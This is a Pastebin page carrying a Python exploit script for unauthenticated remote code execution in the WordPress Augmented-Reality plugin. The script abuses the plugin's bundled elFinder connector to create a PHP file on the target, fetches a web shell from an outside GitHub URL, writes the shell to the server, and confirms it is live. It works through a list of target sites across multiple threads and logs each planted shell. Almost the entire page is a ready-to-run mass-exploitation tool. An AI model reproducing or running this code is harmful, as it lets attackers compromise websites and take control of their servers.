Advertisement
FlyFar

Wordpress Augmented-Reality - Remote Code Execution Unauthenticated

Feb 9th, 2024
1,305
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.24 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
  2. # Date: 2023-09-20
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category : webapps
  5. # Tested on: windows 10 , firefox
  6.  
  7. import requests as req
  8. import json
  9. import sys
  10. import random
  11. import uuid
  12. import urllib.parse
  13. import urllib3
  14. from multiprocessing.dummy import Pool as ThreadPool
  15. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  16. filename="{}.php".format(str(uuid.uuid4())[:8])
  17. proxies = {}
  18. #proxies = {
  19. #  'http': 'http://127.0.0.1:8080',
  20. #  'https': 'http://127.0.0.1:8080',
  21. #}
  22. phash = "l1_Lw"
  23. r=req.Session()
  24. user_agent={
  25. "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
  26. }
  27. r.headers.update(user_agent)
  28. def is_json(myjson):
  29.   try:
  30.     json_object = json.loads(myjson)
  31.   except ValueError as e:
  32.     return False
  33.   return True
  34. def mkfile(target):
  35.     data={"cmd" : "mkfile", "target":phash, "name":filename}
  36.     resp=r.post(target, data=data)
  37.     respon = resp.text
  38.     if resp.status_code == 200 and is_json(respon):
  39.         resp_json=respon.replace(r"\/", "").replace("\\", "")
  40.         resp_json=json.loads(resp_json)
  41.         return resp_json["added"][0]["hash"]
  42.     else:
  43.         return False
  44. def put(target, hash):
  45.     content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
  46.     content=content.text
  47.     data={"cmd" : "put", "target":hash, "content": content}
  48.     respon=r.post(target, data=data, proxies=proxies, verify=False)
  49.     if respon.status_code == 200:
  50.       return True
  51. def exploit(target):
  52.     try:
  53.         vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
  54.         respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
  55.         if respon != 200:
  56.           print("[FAIL] {}".format(target))
  57.           return
  58.         hash=mkfile(vuln_path)
  59.         if hash == False:
  60.           print("[FAIL] {}".format(target))
  61.           return
  62.         if put(vuln_path, hash):
  63.           shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
  64.           status = r.get(shell_path, proxies=proxies, verify=False).status_code
  65.           if status==200 :
  66.               with open("result.txt", "a") as newline:
  67.                   newline.write("{}\n".format(shell_path))
  68.                   newline.close()
  69.               print("[OK] {}".format(shell_path))
  70.               return
  71.           else:
  72.               print("[FAIL] {}".format(target))
  73.               return
  74.         else:
  75.           print("[FAIL] {}".format(target))
  76.           return
  77.     except req.exceptions.SSLError:
  78.           print("[FAIL] {}".format(target))
  79.           return
  80.     except req.exceptions.ConnectionError:
  81.           print("[FAIL] {}".format(target))
  82.           return
  83. def main():
  84.     threads = input("[?] Threads > ")
  85.     list_file = input("[?] List websites file > ")
  86.     print("[!] all result saved in result.txt")
  87.     with open(list_file, "r") as file:
  88.         lines = [line.rstrip() for line in file]
  89.         th = ThreadPool(int(threads))
  90.         th.map(exploit, lines)
  91. if __name__ == "__main__":
  92.     main()
  93.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement